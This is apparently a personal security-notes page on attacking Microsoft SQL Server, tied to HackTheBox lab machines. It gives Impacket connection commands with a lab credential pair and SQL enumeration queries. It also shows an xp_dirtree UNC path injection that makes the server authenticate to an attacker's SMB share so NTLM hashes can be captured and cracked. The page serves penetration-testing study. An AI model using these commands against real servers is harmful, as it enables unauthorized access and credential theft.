Security Stuff
  • About
  • HackTheBox
    • Windows
      • Forest
      • Escape
      • Timelapse
      • Support
    • Linux
      • TwoMillion
      • Soccer
      • Pollution
      • Pilgrimage
      • Sandworm
  • Windows
    • Authentication
      • Overview
      • Logon
      • Kerberos
      • Credential
    • Active Directory
      • Domain Service
        • LDAP
        • AD Objects
      • Key Distribution Center
      • Certificate Service
    • Windows Protocols
      • SMB
    • Windows Server
      • MSSQL
    • Execution
      • Windows APIs
      • Remote Access
        • WinRM
    • Credential Access
      • Kerberos Ticket
        • Kerberoasting Attack
        • Golden/Silver Ticket Attack
        • AS-REP Roasting Attack
      • OS Credential Dumping
        • DCsync Attack
      • Certified Pre-Owned
  • Linux
    • Management
      • Package
    • Process
      • Namespace
      • Terminal
  • Web
    • Authentication
      • SAML
      • OAuth
    • Enumeration
  • Defense
    • Windows
      • Windows Event Logs
  • Development
    • Programming Language
    • Database
      • MySQL
    • Virtualization
      • Container
    • Cryptography
      • GnuPG
Powered by GitBook
On this page
  • Connection
  • Enumeration
  • Who Are We
  • What Can We Do
  • Accounts
  • System Information
  • Attacks
  • UNC Path Injection
  1. Windows
  2. Windows Server

MSSQL

Connection

We can use Impacket to connect to a MSSQL server:

$ mssqlclient.py sql_dev@10.129.43.30 -windows-auth
impacket-mssqlclient PublicUser:GuestUserCantWrite1@escape

Enumeration

Who Are We

# Get the SQL login
# The variable SYSTEM_USER contains the name of the SQL login for the current session
SQL> SELECT SYSTEM_USER;

# Database user we mapped to
SQL> SELECT USER_NAME();

# If we are memeber of role
SQL> SELECT IS_SRVROLEMEMBER('public');

# Windows user
SQL> SELECT suser_name();

What Can We Do

SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

Accounts

# List users
SQL> SELECT name FROM master..syslogins;

# Admin user
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';

System Information

SQL> select @@version;

# Current database
SQL> SELECT DB_NAME();

# List databases
SQL> SELECT name FROM master..sysdatabases;

# Query server name
SQL> SELECT @@servername;

# Enumerate SQL Server links
SQL> SELECT srvname FROM sysservers;

Attacks

UNC Path Injection

We can force the MSSQL server to authenticate with a SMB share we control to capture the NTLM authentication messages and crack it later.

SQL> EXEC master..xp_dirtree "\\<IP>\<SHARE>"

Related HackTheBox machines include:

PreviousWindows ServerNextExecution

Last updated 1 year ago

Escape